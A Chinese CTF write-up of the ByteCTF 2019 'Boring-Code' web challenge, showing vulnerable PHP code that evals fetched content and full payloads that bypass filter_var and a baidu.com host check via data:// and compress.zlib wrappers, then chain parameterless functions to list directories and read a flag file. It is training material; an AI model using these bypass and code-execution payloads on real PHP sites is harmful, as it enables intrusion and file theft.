[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]

时间:2021-10-23 10:25:57

简介

 原题复现:

 考察知识点:无参数命令执行、绕过filter_var(), preg_match()

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

环境复现

目录

www/flag  flag文件
www/code/code.php

代码

 1 <?php
2 function is_valid_url($url) {
3 //FILTER_VALIDATE_URL 过滤器把值作为 URL 进行验证。
4 if (filter_var($url, FILTER_VALIDATE_URL)) {
5 if (preg_match('/data:\/\//i', $url)) {
6 return false;
7 }
8 return true;
9 }
10 return false;
11 }
12
13
14 if (isset($_POST['url'])){
15 $url = $_POST['url'];
16 if (is_valid_url($url)) {
17 $r = parse_url($url);
18 var_dump($r);
19 if (preg_match('/baidu\.com$/', $r['host'])) {
20 $code = file_get_contents($url);
21 var_dump($code);
22 if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
23 if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
24 echo 'bye~';
25 } else {
26 eval($code);
27 }
28 }
29 } else {
30 echo "error: host not allowed";
31 }
32 } else {
33 echo "error: invalid url";
34 }
35 }else{
36 highlight_file(__FILE__);
37 }

审计分析

绕过URL过滤??
通过post传入url值后显示进行is_valid_url这个函数的验证  函数使用了fileter_var()里面的FILTER_VALIDATE_URL这个过滤器来过滤url  为真后 又有一个preg_match正则的判断 不能含有data:\\ 这个东西
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等][原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
到了第18行还有个过滤 将解析后的url的host部分进行正则匹配必须要baidu.com为结尾 才能匹配成功 我们把这里作为第一层先绕过
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等][原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
 
下来就到这一块核心的地方了 考的是无参数RCE
25行的限制只能是a(b())的形式,同时稚嫩共包含字母
26行则限制了很多函数。。那些没被限制我们可以fuzz下 我们把这里作为第二层绕过
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]

绕过第一层

1.额外知识增加(如何绕过filter_var和parse_url)

data://伪协议的利用
如果没有上面第5行的过滤data我们看如何绕过?
可以使用data://伪协议形式绕过
data://text/plain;base64,xxxx
parser_url会将text部分作为host 所以再进行验证的时候就能绕过了  并且PHP对MIME不敏感,我们可以将一些东西注入到MIME中
data://baidu.com/plain;base64,xxxx
将代码中的data://正则验证注释可测试
payload:
POST:url=data://baidu.com/plain,echo('1111')
//string(12) "echo('1111')"
0://hua.com;baidu.com //可以绕过FILTER_VALIDATE_URL过滤器
参考学习来源
 
回到正题有data验证怎么办呢这时候上面的方法根本没办法用。

方法一:使用compress.zlib方式

payload
url=compress.zlib://data:@baidu.com/baidu.com?,echo('1111')

方法二:购买一个xxxbaidu.com的域名(未测试)

购买之后绑定到服务器上 再上传文件下来步骤跟方法三一样

方法三:百度网盘链接

(在这个程序过滤中不行!因为百度云默认有空格 只能自己搭建服务了)
上传1.php  找到下载链接打开1.php编辑从响应里面找。
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等][原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
 
环境测试
搭建测试环境要php.ini修改3个地方 我使用的kali linux2020不用修改默认   本机win10可能需要修改
extension=php_openssl.dll  开启PHPssl扩展
allow_url_include = On 允许引入URL文件
allow_url_fopen = On 允许打开url文件
在linux服务环境下测试成功
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等][原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
windows环境搭建的服务因为post长度限制可能 发现打过去的post会被截断部分导致失败
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等][原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]

方法四:使用ftp协议(未测试)

ftp://ip:port,baidu.com:80/filename.txt

方法五:百度的一个任意跳转漏洞(未测试)

post.baidu.com

第二层正则绕过

第二层考点是无参数rce

获取所有的php函数并保存文件为function.txt
<?php
$a = get_defined_functions()['internal'];
$file = fopen("function.txt","w+");
foreach ($a as $key ) {
echo fputs($file,$key."\r\n");
}
fclose($file);
?>
python 这样就能得到那些php没被过滤掉
import re
f = open('function.txt','r')
for i in f:
function = re.findall(r'/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log',i)
if function == [] and not '_' in i:
print(i) 
根据题目得到flag再上层目录下 所有我们要构造读取上层目录下的文件
 

方法一 phpversion()

    sqrt() : 返回一个数字的平方根
tan() : 返回一个数字的正切
cosh() : 返回一个数字的双曲余弦
sinh() : 返回一个数字的双曲正弦
ceil() : 返回不小于一个数字的下一个整数 , 也就是向上取整
一个点的ascii值 看wp大佬用数学函数写了个脚本实现计算  
<?php
$list = array("ceil","sinh","cosh","tan","floor","sqrt","cos","sin");
foreach($list as $a){
foreach($list as $b){
foreach($list as $c){
foreach($list as $d){
foreach($list as $e){
foreach($list as $f){
foreach($list as $g){
foreach($list as $h){
if($a($b($c($d($e($f($g($h(phpversion())))))))) == 46)
echo "$a+$b+$c+$d+$e+$f+$g+$h"."\n";
}}}}}}}}
?>
这样得到的部分payload解决了我们参数“.”的传递
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]

最终payload:

url=compress.zlib://data:@baidu.com/baidu.com?,echo(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))));

参考学习:http://www.guildhab.top/?p=1077

     https://xz.aliyun.com/t/6737

 

方法二 localtime()+localeconv()

分析一个师傅的payload
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));
 
scandir()   列出目录中的文件和目录。
end() 将内部指针指向数组中的最后一个元素,并输出。
readfile() 输出一个文件
current() 返回数组当前单元
也就是说要这样构造 但是这个题过滤了参数 怎么办?
readfile(end(scandir('.')));
 
这个函数返回的第一个元素就是. 我们可以用current来获取数组中的当前单元 但是这个被过滤了怎么办?
localeconv()   函数返回一包含本地数字及货币格式信息的数组。
 
我们可以使用current()函数的别名pos()函数 这样返回的就是 “.”
pos(localeconv())
这个pyaload如果flag再当前目录可用 但是原题flag不再当前目录怎么办?
readfile(end(scandir(pos(localeconv()))));
读取当前目录下的最后一个文件输出到页面上
 
因为flag再上层目录 我们还需要chrdir() next来重新定义一下php当前目录,再使用readfile来读取文件
chdir()函数改变当前的目录
next()函数将内部指针指向数组中的下一个元素,并输出。 这里可以获取到scandir()返回的".." 
返回上一层payload
chdir(next(scandir(pos(localeconv()))));
返回上一层之后  我们想读文件 但是改变目录执行成功只返回一个1 所以我们需要再构造一个"." 来用上述方法来获取flag 那怎么构造?可以用localtime()函数 来返回46 再用chr转就成了"."
localtime(timestamp,is_assoc);取得本地时间
timestamp 可选,规定Unix时间戳 如未规定则默认time()
is_assoc 可选 规定返回关联数组还是索引数组 如果FALSE则返回索引 默认False
payload 每46秒的时候就会返回"." 
chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))
再和读取文件方式组合一下的最终payload
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

参考学习:https://xz.aliyun.com/t/6316

方法三 if()

使用chdir()返回0和1 来用if判断并执行后面的语句进行文件读取
if(chdir(next(scandir(pos(localeconv())))))readfile(end(scandir(pos(localeconv()))));

[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]的更多相关文章

  1. &lbrack;原题复现&rsqb;&lbrack;CISCN 2019 初赛&rsqb;WEB-Love Math&lpar;无参数RCE&rpar;&lbrack;未完结&rsqb;

    简介  原题复现:  考察知识点:无参数命令执行  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 源码审计 代码 1 ...

  2. &lbrack;原题复现&rsqb;SUCTF 2019 WEB EasySQL&lpar;堆叠注入&rpar;

    简介  原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array() ...

  3. &lbrack;原题复现&rsqb;2019上海大学生WEB-Decade&lpar;无参数RCE、Fuzz)

    简介  原题复现:  考察知识点:无参数命令执行.Fuzz  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 ...

  4. &lbrack;原题复现&rsqb;-HITCON 2016 WEB《babytrick》&lbrack;反序列化&rsqb;

    前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 inc ...

  5. &lbrack;原题复现&rsqb;&lbrack;极客大挑战 2019&rsqb;HardSQL&lpar;updatexml报错注入&rpar;

    简介  原题复现:  考察知识点:SQL注入(报错注入,绕过过滤)  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平 ...

  6. &lbrack;原题复现&plus;审计&rsqb;&lbrack;SUCTF 2019&rsqb; WEB CheckIn&lpar;上传绕过、&period;user&period;ini&rpar;

    简介  原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn  考察知识点:上传绕过..user.ini  线上平台:h ...

  7. &lbrack;原题复现&plus;审计&rsqb;&lbrack;ZJCTF 2019&rsqb; WEB NiZhuanSiWei&lpar;反序列化、PHP伪协议、数组绕过&rpar;

    简介  原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/  考察知识点:反序列化.PHP伪协议.数组绕过   ...

  8. &lbrack;原题复现&rsqb;强网杯 2019 WEB高明的黑客

    简介  原题复现:  考察知识点:python代码编写能力...  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 简 ...

  9. &lbrack;原题复现&rsqb;2018护网杯&lpar;WEB&rpar;easy&lowbar;tornado&lpar;模板注入&rpar;

    简介 原题复现:  考察知识点:模板注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 [护网杯 2018]eas ...

随机推荐

  1. JS自定义属性兼容

    var obj={}; if(obj.dataset){ obj.dataset.original="11"; }else{ obj.getAttribute("data ...

  2. What is a watch descriptor

    http://*.com/questions/24342156/what-are-watch-descriptors-really-linux-inotify-subsyste ...

  3. &lbrack;Effective JavaScript 笔记&rsqb;第31条:使用Object&period;getPrototypeOf函数而不要使用&lowbar;&lowbar;proto&lowbar;&lowbar;属性

    ES5引入Object.getPrototypeOf函数作为获取对象原型的标准API,但由于之前的很多js引擎使用了一个特殊的__proto__属性来达到相同的目的.但有些浏览器并不支持这个__pro ...

  4. 利用Python的三元表达式解决Odoo中工资条中城镇、农村保险的问题

    Python中没有像C#中有三元表达式 A?B:C 但在python中可以通过 A if condition else B 的方式来达到同样的效果. 例如 : 1 if True else 0 输出 ...

  5. &lbrack;置顶&rsqb;&NewLine; MVC中使用signalR入门教程

    一.前言:每次写总要说一点最近的感想 进入工作快半年了,昨天是最郁闷的一天,我怀疑我是不是得了"星期一综合征",每个星期一很没有状态.全身都有点酸痛,这个可能一个星期只有周末才打一 ...

  6. Vue&lpar;小案例&lowbar;vue&plus;axios仿手机app&rpar;&lowbar;购物车(计算商品总金额)

    一.前言                 1.计算总金额                 2.点击删除按钮,删除对应的商品信息                 3.当还没结算的时候,当用户跳到其他页面 ...

  7. thread&sol;threading——Python多线程入门笔记

    1 什么是线程? (1)线程不同于程序. 线程不能够独立执行,必须依存在应用程序中,由应用程序提供多个线程执行控制: 多线程类似于同时执行多个不同程序. (2)线程不同于进程. 每个独立的进程有一个程 ...

  8. hadoop系列 第一坑: hdfs JournalNode Sync Status

    今天早上来公司发现cloudera manager出现了hdfs的警告,如下图: 解决的思路是: 1.首先解决简单的问题,查看警告提示的设置的阀值时多少,这样就可以快速定位到问题在哪了,果然Journ ...

  9. linux &amp&semi; windows下重启oracle

    Linux:方法1 用root以ssh登录到linux,打开终端输入以下命令: cd $ORACLE_HOME #进入到oracle的安装目录 dbstart #重启服务器 lsnrctl start ...

  10. 新男人八题---AStringGame

    终于完成进度男人1/8,为了这题学了sam= = 题意先有一个串,n个子串,两个人轮流每次在子串上加字符,要求加完后还是原串的子串,最后不能加的就是输者,求赢的人 解法:sam之后在构造的状态图上跑s ...